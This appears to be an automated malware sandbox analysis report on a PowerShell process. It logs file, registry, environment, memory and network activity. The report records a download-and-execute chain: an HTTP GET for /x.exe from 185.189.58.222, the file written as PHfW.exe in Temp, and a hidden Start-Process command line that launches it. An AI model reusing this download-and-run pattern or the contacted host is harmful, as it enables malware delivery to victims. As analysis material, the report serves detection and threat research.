Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 size = 4096, size_out = 1920 True 1
Fn
Data
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 size = 128, size_out = 0 True 1
Fn
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 size = 1 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 size = 1 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 4096 True 5
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 53709 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 10424 True 2
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 22040 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 31944 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 8712 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 40656 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 34848 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe size = 27891 True 1
Fn
Data
Delete C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 - True 1
Fn
Delete C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 - True 1
Fn
Registry (218)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2} - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 8
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 8
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe os_pid = 0x5e0, show_window = SW_HIDE True 1
Fn
Module (7)
»
Operation Module Additional Information Success Count Logfile
Load C:\WINDOWS\system32\en-US\tzres.dll.mui base_address = 0x2477cbe0001 True 3
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (460)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 440
Fn
Sleep duration = -1 (infinite) True 1
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 1
Fn
Sleep duration = -1 (infinite) True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 2
Fn
Sleep duration = -1 (infinite) True 2
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 5
Fn
Get Info type = Hardware Information True 5
Fn
Environment (54)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 25
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Threading.OverlappedData_MinCount False 1
Fn
Get Environment String name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Get Environment String name = USERPROFILE, result_out = C:\Users\FD1HVy True 2
Fn
Get Environment String name = PSModuleAutoLoadingPreference False 4
Fn
Get Environment String name = PATH True 1
Fn
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 6
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 2
Fn
Get Environment String name = PSModuleAnalysisCachePath False 1
Fn
Get Environment String name = PSDisableModuleAnalysisCacheCleanup False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Fn
Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Fn
Set Environment String name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 69 bytes
Total Data Received 255.28 KB
Contacted Host Count 1
Contacted Hosts 185.189.58.222
HTTP Session #1
»
Information Value
Server Name 185.189.58.222
Server Port 80
Data Sent 69
Data Received 261403
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = 185.189.58.222, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /x.exe True 1
Fn
Send HTTP Request headers = host: 185.189.58.222, connection: Keep-Alive, url = 185.189.58.222/x.exe True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 53984 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 11616 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 23232 True 1
Fn
Data
Read Response size = 65536, size_out = 31944 True 1
Fn
Data
Read Response size = 65536, size_out = 8712 True 1
Fn
Data
Read Response size = 65536, size_out = 40656 True 1
Fn
Data
Read Response size = 65536, size_out = 34848 True 1
Fn
Data
Read Response size = 46507, size_out = 1452 True 1
Fn
Data
Read Response size = 45055, size_out = 1452 True 1
Fn
Data
Read Response size = 43603, size_out = 11616 True 1
Fn
Data
Read Response size = 31987, size_out = 1452 True 1
Fn
Data
Read Response size = 30535, size_out = 30535 True 1
Fn
Data
Close Session - True 1
Fn
Process #4: powershell.exe
800 0
»
Information Value
ID #4
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:46
OS Process Information
»
Information Value
PID 0x5e0
Parent PID 0x11a0 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 108C
0x 10A0
0x 10C8
0x 10E0
0x 1170
0x D08
0x 938
0x 13F0
0x ACC
0x 1244
0x 734
0x C5C
0x 11C4
0x 10D4
0x C30
0x 12FC
0x 12F4
0x 11CC
0x ADC
0x 1198
0x AB4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x00000052e7290000 0x52e7290000 0x52e730ffff Private Memory Readable, Writable True False False -
private_0x00000052e7310000 0x52e7310000 0x52e738ffff Private Memory Readable, Writable True False False -
private_0x00000052e7390000 0x52e7390000 0x52e73cffff Private Memory Readable, Writable True False False -
private_0x00000052e7400000 0x52e7400000 0x52e75fffff Private Memory Readable, Writable True False False -
private_0x00000052e7600000 0x52e7600000 0x52e767ffff Private Memory Readable, Writable True False False -
private_0x00000052e7680000 0x52e7680000 0x52e76fffff Private Memory Readable, Writable True False False -
private_0x00000052e7700000 0x52e7700000 0x52e777ffff Private Memory Readable, Writable True False False -
private_0x00000052e7780000 0x52e7780000 0x52e77fffff Private Memory Readable, Writable True False False -
private_0x00000052e7800000 0x52e7800000 0x52e787ffff Private Memory Readable, Writable True False False -
private_0x00000052e7880000 0x52e7880000 0x52e78fffff Private Memory Readable, Writable True False False -
private_0x00000052e7900000 0x52e7900000 0x52e797ffff Private Memory Readable, Writable True False False -
private_0x00000052e7980000 0x52e7980000 0x52e79fffff Private Memory Readable, Writable True False False -
private_0x00000052e7a00000 0x52e7a00000 0x52e7a7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7a80000 0x52e7a80000 0x52e7afffff Private Memory Readable, Writable True False False -
